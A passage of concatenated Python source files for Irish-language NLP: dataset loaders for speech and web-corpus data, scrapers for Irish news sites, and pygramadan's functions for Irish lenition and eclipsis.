file_id = xmlfile.stem
audio = ""
for wd in _AUDIO:
try_path = dd_path / wd
ext = "ogg" if wd == "ogg" else "wav"
stem = xmlfile.stem
if 'tcd_gd_text02_' in stem:
stem = stem.replace('tcd_gd_text02_', 'tcd_gd_text02-')
audio = try_path / f"{stem}.{ext}"
if audio.is_file():
break
if audio == "":
logger.info("failed to find audio to match XML: %s", xmlfile)
continue
for pair in zip(words, phonemes):
yield _id, {
"speaker_id": speaker_id,
"file_id": file_id,
"audio": str(audio),
"phonemes": pair[1],
"words": irish_lc(" ".join(pair[0])),
"language": language,
"dialect": dialect,
"audio_set": audio_set
}
_id += 1
class Utterance:
def __init__(self, input, sentences, spoken_like=None):
self.input = input
self.sentences = sentences
if spoken_like is None:
self.spoken_as = []
else:
self.spoken_as = spoken_like
def maybe_xml(self):
return "<" in self.input
def get_xml(self):
if self.maybe_xml():
return "<utt>" + saxutils.unescape(self.input) + "</utt>"
else:
return None
def get_spoken_like(self):
if not self.maybe_xml():
return
source = io.StringIO(self.get_xml())
tree = ET.parse(source)
root = tree.getroot()
slikes = set()
for sl in root.findall('./spoken-like'):
if 'orth' in sl.attrib:
orth = sl.attrib['orth'].strip()
text = sl.text.strip()
slikes.add((text, orth))
return list(slikes)
class Sentence:
def __init__(self, input, tokens):
self.input = input
self.tokens = tokens
class Token:
def __init__(self, input, words):
self.input = input
self.words = words
class Word:
def __init__(self, input, source, syllables):
self.input = input
self.source = source
self.syllables = syllables
if self.syllables is None:
self.syllables = []
def skippable(self):
if self.input in ["SILENCE_TOKEN", "GLOTTAL_STOP"]:
return True
if len(self.syllables) == 1 \
and len(self.syllables[0].phonemes) == 1 \
and self.syllables[0].phonemes[0].skippable():
return True
return False
class Syllable:
def __init__(self, stress: int = 0, phonemes = None):
self.stress = stress
self.phonemes = phonemes
if self.phonemes is None:
self.phonemes = []
class Phoneme:
def __init__(self, symbol: str = "", end: float = 0.0):
self.symbol = symbol
self.end = end
def skippable(self):
return self.symbol == "sil"
def from_xml(source):
tree = ET.parse(source)
root = tree.getroot()
if 'input_string' in root.attrib:
input = root.attrib['input_string']
else:
input = ''
sentences = []
for sentence in root.findall('./sentence'):
if 'input_string' in sentence.attrib:
input = sentence.attrib['input_string']
else:
input = ''
tokens = []
for token in sentence.findall('./token'):
if 'input_string' in token.attrib:
input = token.attrib['input_string']
else:
input = ''
words = []
for word in token.findall('./word'):
if 'input_string' in word.attrib:
input = word.attrib['input_string']
else:
input = ""
if 'trans_source' in word.attrib:
source = word.attrib['trans_source']
else:
source = ""
syllables = []
for syllable in word.findall('./syllable'):
phonemes = []
if 'stress' in syllable.attrib:
if syllable.attrib['stress'] == 'None':
stress = 0
else:
stress = int(syllable.attrib['stress'])
else:
stress = 0
for phoneme in syllable.findall('./phoneme'):
if 'symbol' in phoneme.attrib:
symbol = phoneme.attrib['symbol']
else:
symbol = ''
if 'end' in phoneme.attrib:
end = float(phoneme.attrib['end'])
else:
symbol = 0.0
phonemes.append(Phoneme(symbol, end))
syllables.append(Syllable(stress, phonemes))
words.append(Word(input, source, syllables))
tokens.append(Token(input, words))
sentences.append(Sentence(input, tokens))
return Utterance(input, sentences)
def is_punct(tok):
return tok in [".", ","]
def utt_to_words(utterance: Utterance):
sentences = []
for sentence in utterance.sentences:
words = []
for token in sentence.tokens:
for word in token.words:
if word.skippable():
continue
else:
words.append(word.input)
sentences.append(words)
return sentences
def utt_to_phonemes(utterance: Utterance):
sentences = []
for sentence in utterance.sentences:
phonemes = []
for token in sentence.tokens:
for word in token.words:
for syllable in word.syllables:
for phoneme in syllable.phonemes:
if phoneme.skippable():
continue
else:
phonemes.append(phoneme.symbol)
sentences.append(phonemes)
return sentences
def _irish_lc_word(word: str) -> str:
if word[0:1] in ["n", "t"] and word[1:2] in "AEIOUÁÉÍÓÚ":
return word[0:1] + "-" + word[1:].lower()
else:
return word.lower()
def irish_lc(string: str) -> str:
return " ".join(list(map(_irish_lc_word, string.split(" "))))
```
#### File: notes/_drafts/corpuscrawler-irish.py
```python
import collections
import os
import re
import struct
import unicodedata
import base64
import hashlib
from html.entities import name2codepoint
from email import message_from_string as Message
from urllib.parse import urlparse
from pathlib import Path
import datasets
_DESCRIPTION = """\
Irish web corpus, crawled with Corpus Crawler.
Uses a list of URLs, collected by the crawler, to
retrieve the files from the crawler's cache.
"""
#_SCRAPES = ["20180911", "20191117", "20210810"]
_SCRAPES = ["20191117", "20210810"]
logger = datasets.utils.logging.get_logger(__name__)
_DATA_URL = 'https://huggingface.co/datasets/phonlab-tcd/corpuscrawler-ga/raw/main/crawled-{}.txt'
class CorpusCrawlerIrish(datasets.GeneratorBasedBuilder):
"""Corpus Crawler crawled text dataset."""
BUILDER_CONFIGS = [
datasets.BuilderConfig(name=f"{scrape}_{cfg}")
for scrape in _SCRAPES
for cfg in ["documents", "paragraphs"]
]
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
"url": datasets.Value("string"),
"genre": datasets.Value("string"),
"publication_date": datasets.Value("string"),
"title": datasets.Value("string"),
"text": datasets.Value("string"),
"video_url": datasets.Value("string"),
}
),
)
def _split_generators(self, dl_manager):
manual_dir = os.path.abspath(os.path.expanduser(dl_manager.manual_dir))
scrape_set = self.config.name
sset = self.config.name.split('_')[0]
dl_path = dl_manager.download(_DATA_URL.format(sset))
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={
"name": scrape_set,
"data_dir": manual_dir,
"data_file": dl_path,
})
]
def _generate_examples(self, name, data_dir, data_file):
"""Generate examples from a Corpus Crawl cache."""
logger.info("generating examples from = %s", name)
scfg = self.config.name.split('_')[1]
links = _get_links(data_file)
if not self.config.data_dir:
self.config.data_dir = data_dir
dd_path = Path(data_dir)
if not dd_path.is_dir():
raise Exception('No directory: ' + data_dir)
_id = 1
for link in links:
if not link:
continue
res = self._fetch_page(link, data_dir)
if res is None:
raise Exception("Failed to read " + link + " from " + data_dir)
if scfg == "documents":
text = ["\n".join(res.get('text', []))]
else:
text = res.get('text', [])
for para in text:
example = {
"genre": res.get('genre', ''),
"url": res.get('location', link),
"publication_date": res.get('publication-date', ''),
"video_url": res.get('video', ''),
"title": res.get('title', ''),
"text": para
}
yield _id, example
_id += 1
def _fetch_page(self, url, data_dir):
_EXTRATORS = {
'www.unicode.org': do_udhr,
'tuairisc.ie': do_tuairisc_ie,
'www.rte.ie': do_nuachtrte,
'www.irishtimes.com': do_irishtimes,
'www.chg.gov.ie': do_chg,
'www.ainm.ie': do_ainm_ie,
'gaeltacht21.blogspot.com': do_blogspot,
'aonghus.blogspot.com': do_blogspot,
'nimill.blogspot.com': do_blogspot,
'turasailse.blogspot.com': do_blogspot,
'caomhach.blogspot.com': do_blogspot,
'breacleabhar.blogspot.com': do_blogspot,
'gearoid.blogspot.com': do_blogspot,
'philo-celtic.blogspot.com': do_blogspot,
'iomhannablag.blogspot.com': do_blogspot,
'smaointefanacha.blogspot.com': do_blogspot,
'imeall.blogspot.com': do_blogspot,
'coislife.ie': do_coislife_ie,
'meoneile.ie': do_meoneile_ie,
'peig.ie': do_peig_ie,
'www.forasnagaeilge.ie': do_forasnagaeilge_ie,
}
parsed_url = urlparse(url)
host = parsed_url.netloc
extract = _EXTRATORS.get(host)
if extract:
fr = fetch(data_dir, url)
if fr is None:
raise Exception("Failed to fetch " + url + " from " + data_dir)
return extract(fr)
# Corpus Crawler: utils.py
_TAG_REGEX = re.compile(r'\<.+?\>', flags=re.DOTALL)
def striptags(s):
return _TAG_REGEX.sub('', s)
def unichar(i):
try:
return chr(i)
except ValueError:
# non-BMP codepoint in narrow Python build
return struct.pack('i', i).decode('utf-32')
def replace_html_entities(html):
entities = name2codepoint
html = re.sub(r'&#([0-9]+);',
lambda z:unichar(int(z.group(1))), html)
html = re.sub(r'&#[xX]([0-9a-fA-F]+);',
lambda z:unichar(int(z.group(1), 16)), html)
html = re.sub(r'&([a-zA-Z]+);',
lambda z:unichar(entities.get(z.group(1).lower(), 0x20)), html)
return html
def cleantext(html):
html = re.sub(r'<script.+?</script>', ' ', html, flags=re.DOTALL)
html = replace_html_entities(striptags(html))
# Some web sites insert zero-width spaces, possibly as byte order marks
# (from Microsoft Notepad) which their scripts failed to recognize as such.
html = html.replace('\u200B', '')
return unicodedata.normalize('NFC', ' '.join(html.split()))
def clean_paragraphs(html):
text = html.replace('\n', ' ')
text = re.sub(r'</(?:div|DIV|p|P|[hH][1-6]|table|TABLE|tr|td|article)>',
'\n', text)
text = re.sub(r'<(?:br|BR)\s*/?>', '\n', text)
return list(filter(None, [cleantext(p) for p in text.split('\n')]))
def extract(before, after, html):
s = html.split(before, 1)
return s[1].split(after)[0] if len(s) == 2 else None
FetchResult = collections.namedtuple('FetchResult',
['headers', 'content', 'url', 'filepath'])
def fetch(cache_dir, url):
logger.info("fetching url %s from cache %s", url, cache_dir)
try:
digest = hashlib.sha256(url.encode('utf-8')).digest()
filepath = os.path.join(cache_dir,
"f" + base64.urlsafe_b64encode(digest).decode('utf-8'))
except:
digest = hashlib.sha256(url).digest()
filepath = os.path.join(cache_dir,
"f" + base64.urlsafe_b64encode(digest))
fp = Path(filepath)
if not fp.is_file():
raise Exception("No such file: " + fp)
try:
with open(filepath, 'r', encoding='utf-8-sig', newline='') as f:
file_content = f.read()
if '\r\n\r\n\r\n' in file_content:
splitter = '\r\n\r\n\r\n'
else:
splitter = '\n\n\n'
cached = file_content.split(splitter, 1)
if len(cached) == 2:
headers, content = cached
try:
content = content.encode('utf-8')
except:
# already encoded as bytes
pass
headers = Message(headers)
if not content:
raise Exception("empty content")
return FetchResult(headers, content, url, filepath)
else:
raise Exception("splitting headers and content failed")
except IOError:
raise Exception("fetch() failed")
def do_udhr(fetchresult):
out = {}
text = fetchresult.content.decode('utf-8').split('---', 1)[1]
out['location'] = fetchresult.url
out['genre'] = 'Legal'
paras = []
for paragraph in text.splitlines():
paragraph = paragraph.strip()
if len(paragraph) > 0:
paras.append(paragraph)
out['text'] = paras
return out
# corpuscrawler: crawl_ga.py
_ENGLISH_MONTHS = {
'january': 1,
'february': 2,
'march': 3,
'april': 4,
'may': 5,
'june': 6,
'july': 7,
'august': 8,
'september': 9,
'october': 10,
'november': 11,
'december': 12
}
def _byline_to_pubdate(byline):
date = re.search(r'(\d{1,2}) ([^ ]+?) (\d{4})', byline)
if not date:
return None
day = int(date.group(1))
year = int(date.group(3))
month = _ENGLISH_MONTHS[date.group(2).lower()]
if not month:
return None
out = "{}-{:0>2d}-{:0>2d}".format(year, month, day)
return out
def _rte_writable_paragraph(text):
if text == '':
return False
if text.startswith('© RTÉ '):
return False
if text.startswith('By using this website, you consent'):
return False
if text.startswith('RTÉ.ie is the website of Raidió Te<NAME>'):
return False
if text.find('is not responsible for the content') >= 0:
return False
if text.find('RTÉ uses cookies in accordance with our Cookie Policy') >= 0:
return False
if re.match('^[\*\+]+$', text):
return False
return True
def _rte_cleanall(html):
section_article_regex = re.compile(r'<section[^>]+itemprop="articleBody"[^>]*>')
search = section_article_regex.search(html)
out = []
if search:
body = extract(search.group(0), '</section>', html)
for para in clean_paragraphs(body):
if _rte_writable_paragraph(para):
out.append(para)
return '\n'.join(out)
for paragraph in re.findall(r'<p>(.+?)</p>', html):
cleaned = cleantext(paragraph)
if _rte_writable_paragraph(cleaned):
out.append(cleaned)
else:
continue
return out
def _sceala_clean(paras):
out = []
for para in paras:
if '\n____' not in para:
out.append(para)
else:
out.append(para.split('\n____')[0])
break
return out
def do_nuachtrte(fetchresult):
out = {}
pubdate_regex = re.compile(r'name="DC.date" (?:scheme="DCTERMS.URI" )?content="([0-9T:+\-]{19,25})"')
html = fetchresult.content.decode('utf-8')
pubdate_match = pubdate_regex.search(html)
pubdate = pubdate_match.group(1) if pubdate_match else None
if pubdate is None: pubdate = fetchresult.headers.get('Last-Modified')
out['location'] = fetchresult.url
if 'nuacht' in fetchresult.url:
out['genre'] = 'News'
if pubdate:
out['publication-date'] = pubdate
title = re.search(r'<title>(.+?)</title>', html)
if title:
title = striptags(title.group(1).split('- RTÉ')[0]).strip()
if title:
out['title'] = cleantext(title)
cleaned = _rte_cleanall(html)
if '/sceala/' in fetchresult.url:
cleaned = _sceala_clean(cleaned)
out['text'] = cleaned
return out
def do_meoneile_ie(fetchresult):
out = {}
html = fetchresult.content.decode('utf-8')
title = extract(r'<title>', '</title>', html).strip()
title = title.split('<')[0].strip() if title else ''
video = re.search(r"<iframe.*src='(//player.vimeo.com/video/[0-9]+)[^>]*></iframe>", html)
body = extract("<div class='article-content'>", '</article>', html) or ''
byline = extract("<div class='byline'>", '</span>', html) or ''
byline = _byline_to_pubdate(byline)
if title:
out['title'] = title
paras = clean_paragraphs(body)
if paras:
out['location'] = fetchresult.url
out['genre'] = 'News'
if video:
out['video'] = f'https:{video.group(1)}'
if byline:
out['publication-date'] = byline
paras_filt = []
for para in paras:
if para == 'Roinn':
continue
else:
paras_filt.append(para)
out['text'] = paras_filt
return out
def do_irishtimes(fetchresult):
out = {}
html = fetchresult.content.decode('utf-8')
pubdatere1 = re.compile(r'<meta itemprop="datePublished" content="([^"]*)"/>')
pubdatere2 = re.compile(r'"datePublished": "([^"])"')
out['location'] = fetchresult.url
out['genre'] = 'News'
title = re.search(r'<title>(.+?)</title>', html)
pubdate_match = pubdatere1.search(html)
pubdate_match = pubdate_match if pubdate_match else pubdatere2.search(html)
pubdate = pubdate_match.group(1) if pubdate_match else None
if pubdate is None:
pubdate = fetchresult.headers.get('Last-Modified')
if pubdate:
out['publication-date'] = pubdate
if title:
out['title'] = cleantext(title.group(1))
paras = []
for paragraph in re.findall(
r'<p class="no_name">(.+?)</p>',
html.split('<div class="article_bodycopy">')[1]):
cleaned = cleantext(paragraph)
paras.append(cleaned)
out['text'] = paras
def do_blogspot(fetchresult):
out = {}
pubdate_regex = re.compile(
r"<abbr class='published' title='([^']*)'>[^<]*</abbr>")
html = fetchresult.content.decode('utf-8')
pubdate_match = pubdate_regex.search(html)
pubdate = pubdate_match.group(1) if pubdate_match else None
if pubdate is None: pubdate = fetchresult.headers.get('Last-Modified')
title = re.search(r"<meta content='([^']+)' property='og:title'/>",
html)
title = title.group(1) if title else ''
post = extract("<div class='post-body entry-content'>",
"<div class='post-footer'>", html)
if post == None:
post = extract("<div class='post-header'>",
"<div class='post-footer'>", html)
if post == None:
post = extract('<div class="post-body">',
'<p class="post-footer">', html)
paras = clean_paragraphs(post)
if paras:
out['title'] = title
out['location'] = fetchresult.url
out['genre'] = 'News'
if pubdate:
out['publication-date'] = pubdate
out['text'] = paras
return out
def do_ainm_ie(fetchresult):
out = {}
html = fetchresult.content.decode('utf-8')
title = re.search(r'<title>(.+?)</title>', html)
title = title.group(1).split('|')[0] if title else ''
body = extract('<div class="article">',
'<!-- .contentWrapper-->', html) or ''
body = body.split('<div id="machines"')[0]
paras = clean_paragraphs(body)
pubdate = fetchresult.headers.get('Last-Modified')
if paras:
out['title'] = title
out['location'] = fetchresult.url
out['genre'] = 'Biography'
if pubdate:
out['publication-date'] = pubdate
out['text'] = paras
return out
def do_tuairisc_ie(fetchresult):
out = {}
pubdate_regex = re.compile(
r'<time datetime="(20\d\d-\d\d-\d\d)\s+(\d\d:\d\d)" '
r'itemprop="datePublished">')
html = fetchresult.content.decode('utf-8')
title = extract('<h1 class="title article--full__title">', '</h1>',
html) or ''
pubdate_match = pubdate_regex.search(html)
if pubdate_match:
pubdate = '%sT%s:00Z' % (
pubdate_match.group(1), pubdate_match.group(2))
body = extract(
'<div class="article--full__content" itemprop="articleBody">',
'</article>', html)
if body:
paras = clean_paragraphs(body)
if paras:
out['title'] = title
out['location'] = fetchresult.url
out['genre'] = 'News'
if pubdate:
out['publication-date'] = pubdate
out['text'] = paras
return out
def do_coislife_ie(fetchresult):
out = {}
html = fetchresult.content.decode('utf-8')
title = re.search(r'<title>(.+?)</title>', html)
title = title.group(1).split('–')[0].strip() if title else ''
desc = re.search(r'<meta property="og:description" content="([^"]+?)"', html)
desc = cleantext(desc.group(1))
body = extract('<div class="tab-content">',
'<div class="entry-content in fade tab-pane" id="tab-additional_information">', html) or ''
paras = clean_paragraphs(title + '<br/>' + body)
pubdate = fetchresult.headers.get('Last-Modified')
if paras:
out['title'] = title
out['location'] = fetchresult.url
out['genre'] = 'Commerce'
if desc:
out['description'] = desc
if pubdate:
out['publication-date'] = pubdate
outp = []
for para in paras:
if para.find('<NAME> as an leabhar') >= 0:
continue
else:
outp.append(para)
out['text'] = outp
return out
def do_chg(fetchresult):
out = {}
def _chg_content(page):
return page.split('<div class="container" id="article">')[1].split('<!-- /.right columns -->')[0]
phtml = fetchresult.content.decode('utf-8')
ptext = _chg_content(phtml)
title = re.search(r'<title>(.+?)</title>', phtml)
if title: title = striptags(title.group(1).split('|')[0]).strip()
pubdate = fetchresult.headers.get('Last-Modified')
out['location'] = fetchresult.url
out['genre'] = 'Government'
if pubdate:
out['publication-date'] = pubdate
if title:
out['title'] = title
paras = []
for paragraph in re.findall(r'<p>(.+?)</p>', ptext):
cleaned = cleantext(paragraph)
paras.append(cleaned)
out['text'] = paras
return out
def do_peig_ie(fetchresult):
out = {}
def peig_cat(page):
if page.find('/imeachtai/') >= 0:
return 'Events'
elif page.find('peig.ie/20') >= 0:
return 'News'
elif page.find('/fol%C3%BAntais/') >= 0:
return 'Job listings'
else:
return ''
# Peig.ie has a lot of posts from other sites
html = fetchresult.content.decode('utf-8')
title = re.search(r'<title>(.+?)</title>', html)
title = title.group(1).split('|')[0].strip() if title else ''
if '<meta property="article:modified_time"' in html:
date = re.search(r'<meta property="article:modified_time" content="([^"]+)"', html).group(1)
else:
date = re.search(r'"datePublished":"([^"]+)"', html).group(1)
body = extract('<div class="uk-margin-medium-top" property="text">', '<ul class="uk-pagination', html) or ''
paras = clean_paragraphs(body)
genre = peig_cat(fetchresult.url)
if paras:
out['location'] = fetchresult.url
if title:
out['title'] = title
if genre:
out['genre'] = genre
if date:
out['publication-date'] = date
out['text'] = paras
return out
def do_forasnagaeilge_ie(fetchresult):
out = {}
pubdate_regex = re.compile(r'"datePublished":"([^"]+)",')
html = fetchresult.content.decode('utf-8')
if '<html class="no-js" lang="en">' in html:
return {}
title = extract('<title>', ' - www.forasnagaeilge.ie</title>',
html) or ''
pubdate_match = pubdate_regex.search(html)
if pubdate_match:
pubdate = pubdate_match.group(1)
body = extract(
'<div id="main" class="container">',
'</div><!-- /.content -->', html)
if body:
paras = clean_paragraphs(body)
if paras:
out['location'] = fetchresult.url
out['genre'] = 'News'
if title:
out['title'] = title
if pubdate:
out['publication-date'] = pubdate
out['text'] = paras
return out
def _get_links(scrape):
links = set()
if not os.path.exists(scrape):
raise Exception(f"File {scrape} does not exist")
with open(scrape) as f:
for url in f.readlines():
links.add(url.rstrip())
return list(links)
```
#### File: notes/_drafts/nos.py
```python
import os
from pathlib import Path
import datasets
from bs4 import BeautifulSoup
import requests
_DESCRIPTION = """\
Nós is an Irish-language magazine site.
This script crawls the Nós website to create a text dataset.
"""
class NosDataset(datasets.GeneratorBasedBuilder):
"""Scraper dataset for Nós."""
VERSION = datasets.Version("1.1.0")
BUILDER_CONFIGS = [
datasets.BuilderConfig(name="documents", version=VERSION, description="Plain text portion of the corpus: whole documents"),
datasets.BuilderConfig(name="paragraphs", version=VERSION, description="Plain text portion of the corpus: paragraphs"),
]
def _info(self):
features = datasets.Features(
{
"title": datasets.Value("string"),
"subtitle": datasets.Value("string"),
"url": datasets.Value("string"),
"author": datasets.Value("string"),
"date": datasets.Value("string"),
"text": datasets.Value("string"),
"video_url": datasets.Value("string"),
"categories": datasets.Sequence(datasets.Value("string")),
"tags": datasets.Sequence(datasets.Value("string")),
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={
"split": "train",
},
),
]
def _generate_examples(
self, split
):
""" Yields examples as (key, example) tuples. """
menu_links = _read_menu()
articles = _get_article_list(menu_links)
_id = 1
for url in articles:
page = requests.get(url)
soup = BeautifulSoup(page.text, 'lxml')
title = _get_title(soup)
subtitle = _get_subhead(soup)
details = _get_details(soup)
paras = _get_text(soup)
video = _get_video(soup)
if self.config.name == "documents":
paras = ['\n'.join(paras)]
for para in paras:
yield _id, {
"title": title,
"subtitle": subtitle,
"url": url,
"author": details.get("author", ""),
"date": details.get("date", ""),
"categories": details.get("categories", []),
"tags": details.get("tags", []),
"video_url": video,
"text": para
}
_id += 1
def _get_title(soup):
title_tag = soup.find('title')
ogtitle = soup.find("meta", {"property": "og:title"})
ogtitle_text = ogtitle.get('content', '')
if title_tag and title_tag.text and title_tag.text.strip() != "":
return title_tag.text.strip()
elif ogtitle_text and ogtitle_text.strip() != "":
return ogtitle_text.strip()
def _get_text(soup):
out = []
content = soup.find("div", {"id": "single-area-center"})
for para in content.find_all('p'):
if para.text and para.text.strip() != "":
out.append(para.text.strip().replace('\xa0', ' '))
return out
def _get_video(soup):
vid = soup.find('div', {'id': 'video-wrapper'})
if vid:
iframe = vid.find('iframe')
if iframe:
return iframe.get('src', '')
return ''
def _get_subhead(soup):
out = []
content = soup.find("div", {"id": "single-area-center"})
if content.h1 and content.h1.span:
return content.h1.span.get_text(strip=True)
else:
return ''
def _get_details(soup):
details = {}
pubdet = soup.find("div", {"id": "single-publish-details"})
ptags = [p for p in pubdet.find_all('p')]
if ptags[0].b:
details['author'] = ptags[0].b.get_text(strip=True)
if ptags[1]:
details['date'] = ptags[1].get_text(strip=True)
broll = pubdet.find("div", {"class": "blogroll-tag-category"})
cats = set()
for cat in broll.find_all("a", {"class": "featured-category"}):
if cat.get_text(strip=True) != "":
cats.add(cat.get_text(strip=True))
if len(cats) > 0:
details['categories'] = list(cats)
tags = set()
for tag in broll.find_all("a", {"class": "featured-tag"}):
if tag.get_text(strip=True) != "":
tags.add(tag.get_text(strip=True))
if len(tags) > 0:
details['tags'] = list(tags)
return details
def _get_remainder(soup):
import re
pagination = soup.find("div", {"class": "pagination"})
if not pagination:
return []
current = pagination.find("span", {"class": "current"})
if not (current and current.get_text(strip=True) == "1"):
return []
cats = [a for a in pagination.find_all('a')]
last_cat = cats[-1]
last_url = last_cat.get('href', '')
if not last_url:
return []
m = re.match("(.*/)([0-9]+)/$", last_url)
if not m:
return []
base = m.group(1)
num = int(m.group(2)) + 1
return [f'{base}{i}/' for i in range(2, num)]
def _collect_articles(soup):
out = set()
for art in soup.find_all("article", {"class": "blogroll-post"}):
a = art.find('a')
out.add(a.get('href'))
return list(out)
def _read_menu():
page = requests.get("http://nos.ie/")
soup = BeautifulSoup(page.text, 'lxml')
menu = soup.find("ul", {"id": "menu-main-menu"})
cat_pages = set()
for li in menu.find_all("li"):
if li.a:
cat_pages.add(li.a['href'])
return cat_pages
def _get_article_list(urls):
rest = set()
articles = set()
for url in urls:
page = requests.get(url)
soup = BeautifulSoup(page.text, 'lxml')
new = _get_remainder(soup)
rest = rest.union(new)
art = _collect_articles(soup)
articles = articles.union(art)
for url in rest:
page = requests.get(url)
soup = BeautifulSoup(page.text, 'lxml')
art = _collect_articles(soup)
articles = articles.union(art)
return list(articles)
``` |
{
"source": "jimregan/pygramadan",
"score": 3
} |
#### File: pygramadan/pygramadan/mutation.py
```python
from typing import List
def safestart(text: str, piece: str, lc: bool = False) -> bool:
"""
Checks if text starts with another, safely
:param text: the string to check
:param piece: the start string
:return: true if text starts with piece
"""
check = text if lc else text.lower()
return len(text) >= len(piece) and check.startswith(piece)
def is_vowel(char: str) -> bool:
"""
Checks if the character is an Irish vowel (aeiouáéíóú).
:param char: the character to check
:return: true if the input is a single character, and is an Irish vowel
"""
vowels = "aeiouáéíóú"
return len(char) == 1 and char.lower()[0] in vowels
def is_uppervowel(char: str) -> bool:
"""
Checks if the character is an uppercase Irish vowel (aeiouáéíóú).
:param char: the character to check
:return: true if the input is a single character, is uppercase, and is an Irish vowel
"""
vowels = "AEIOUÁÉÍÓÚ"
return len(char) == 1 and char[0] in vowels
def ends_dentals(text: str) -> bool:
"""
Checks if the word ends with a "dentals" consonant.
("DeNTalS" is a mnemonic to remember the consonants dnts)
:param text: the string to check
:return: true if the input ends with one of 'dnts'
"""
return text.lower()[-1] in "dnts"
def starts_bilabial(text: str) -> bool:
"""
Checks if the word starts with b, m, or p.
:param text: the string to check
:return: true if the input starts with one of 'bmp'
"""
return len(text) > 0 and text.lower()[0] in "bmp"
def starts_vowel(text: str) -> bool:
"""
Checks if the word starts with a vowel.
:param text: the string to check
:return: true if the input starts with a vowel
"""
return len(text) > 0 and is_vowel(text[0])
def ends_vowel(text: str) -> bool:
"""
Checks if the word ends with a vowel.
:param text: the string to check
:return: true if the input ends with a vowel
"""
return len(text) > 0 and is_vowel(text[-1])
def starts_uppervowel(text: str) -> bool:
"""
Checks if the word starts with an uppercase vowel.
:param text: the string to check
:return: true if the input starts with an uppercase vowel
"""
return len(text) > 0 and is_uppervowel(text[0])
def starts_vowelfhx(text: str) -> bool:
"""
Checks if the word starts with a vowel, or 'fh', unless
followed by l or r.
:param text: the string to check
:return: true if the input starts with a vowel or fh, but not fhl or fhr
"""
lc = text.lower()
if lc[0:3] == 'fhl' or lc[0:3] == 'fhr':
return False
else:
return lc[0:2] == 'fh' or starts_vowel(text)
def starts_fvowel(text: str) -> bool:
"""
Checks if the word starts with a vowel, or 'f'.
:param text: the string to check
:return: true if the input starts with a vowel or f
"""
return len(text) > 0 and (is_vowel(text[0]) or text[0].lower() == 'f')
def starts_fthenvowel(text: str) -> bool:
"""
Checks if the word starts with 'f' followed by a vowel
:param text: the string to check
:return: true if the input starts with f followed by a vowel
"""
return text[0:1].lower() == 'f' and starts_vowel(text[1:])
def is_mutable_s(text: str) -> bool:
"""
Checks if the word starts with a mutable 's'.
('s' is mutable when followed by a vowel, n, r, or l)
:param text: the string to check
:return: true if the input starts with a mutable s
"""
lc = text.lower()
return len(lc) >= 2 and lc[0] == 's' and lc[1] in "rnlaeiouáéíóú"
def lenition(text: str, restriction: str = "") -> str:
"""
Lenites the string.
Lenition (séimhiú) is an initial mutation that applies to consonants.
The orthographical realisation is via the insertion of 'h' after
the initial consonant, if applicable: 'bcdfgmpst' are the letters that
can be lenited; however, certain environments have restrictions on
certain letters.
:param text: the string to be lenited
:param restriction: prevent lenition from being applied to these characters
:return: the lenited string, if applicable, otherwise the value of text
>>> from pygramadan.mutation import lenition
>>> lenition("cat")
'chat'
"""
def dolen(text: str) -> str:
if text[0:2].isupper():
return text[0] + 'H' + text[1:]
else:
return text[0] + 'h' + text[1:]
if len(text) > 1 and text.lower()[1] == 'j':
return text
lc = text.lower()
if len(text) >= 1 and lc[0] in "bcdfgmpt" and lc[0] not in restriction:
return dolen(text)
elif is_mutable_s(text) and 's' not in restriction:
return dolen(text)
else:
return text
def d_lenition(text, restriction=""):
"""
Helper function for past tense mutation, where vowels are
prefixed with "d'", and 'f' is lenited and prefixed with "d'"
:param text: the string to be lenited
:param restriction: prevent lenition from being applied to these characters
:return: the lenited string, if applicable, otherwise the value of text
>>> from pygramadan.mutation import d_lenition
>>> d_lenition("fág")
"d'fhág"
"""
lc = text.lower()
if starts_vowel(text):
return "d'" + text
elif lc[0:1] == 'f':
return "d'" + lenition(text, restriction)
else:
return lenition(text, restriction)
def eclipsis(text: str, restriction: str = "") -> str:
"""
Eclipses the string.
Eclipsis (urú) is an initial mutation that applies to consonants and vowels.
Voiced consonants and vowels are nasalised, while devoiced consonants are
voiced. Orthographically, this is realised by prepending a consonant with
the new phonetic value to the word.
With consonants, this new value "eclipses" the original, e.g., 'c' is
eclipsed as 'gc': only the 'g' is pronounced.
:param text: the string to be eclipsed
:param restriction: prevent eclipsis from being applied to these characters
:return: the eclipsed string, if applicable, otherwise the value of text
>>> from pygramadan.mutation import eclipsis
>>> eclipsis("cat")
'gcat'
"""
mut = {
'b': 'm',
'c': 'g',
'd': 'n',
'f': 'bh',
'g': 'n',
'p': 'b',
't': 'd'
}
firstl = text.lower()[0]
if len(text) < 1:
return text
if is_uppervowel(text[0]):
return "n" + text
elif firstl == text[0] and is_vowel(text[0]):
return "n-" + text
elif firstl in mut and firstl not in restriction:
return mut[firstl] + text
else:
return text
def unlenite(text: str) -> str:
"""
Removes lenition from a word.
:param text: the string to unlenite
:return: the string with lenition removed, if applicable, otherwise unmodified
>>> from pygramadan.mutation import unlenite
>>> unlenite("chat")
'cat'
"""
cons = "bcdfgmpst"
lc = text.lower()
if len(text) >= 2 and lc[0] in cons and lc[1] == 'h':
return text[0] + text[2:]
else:
return text
def _safestart_list(text: str, pieces: List[str], lc: bool = False) -> bool:
"""safestart() but for a list of pieces"""
for piece in pieces:
if safestart(text, piece, lc):
return True
return False
def uneclipse(text: str) -> str:
"""
Removes eclipsis from a word.
:param text: the string to uneclipse
:return: the string with eclipse removed, if applicable, otherwise unmodified
>>> from pygramadan.mutation import uneclipse
>>> uneclipse("gcat")
'cat'
"""
if safestart(text, "bhf"):
return text[2:]
elif safestart(text, "n-") and is_vowel(text[2:3]):
return text[2:]
elif text[0:1] == 'n' and is_uppervowel(text[1:2]):
return text[1:]
elif _safestart_list(text, ["mb", "gc", "nd", "ng", "bp", "dt"]):
return text[1:]
else:
return text
```
#### File: pygramadan/pygramadan/noun.py
```python
from .forms import Form, FormPlGen, FormSg
from .attributes import Gender
from .xml_helpers import formsg_node, formpl_node, formplgen_node, write_sg, write_pl, write_pl_gen
from typing import List
import xml.etree.ElementTree as ET
class Noun:
def __str__(self) -> str:
return self._gramadan_string()
def _gramadan_string(self) -> str:
snom = 'sgNom: [' + '] ['.join([f.value for f in self.sg_nom]) + '] \n'
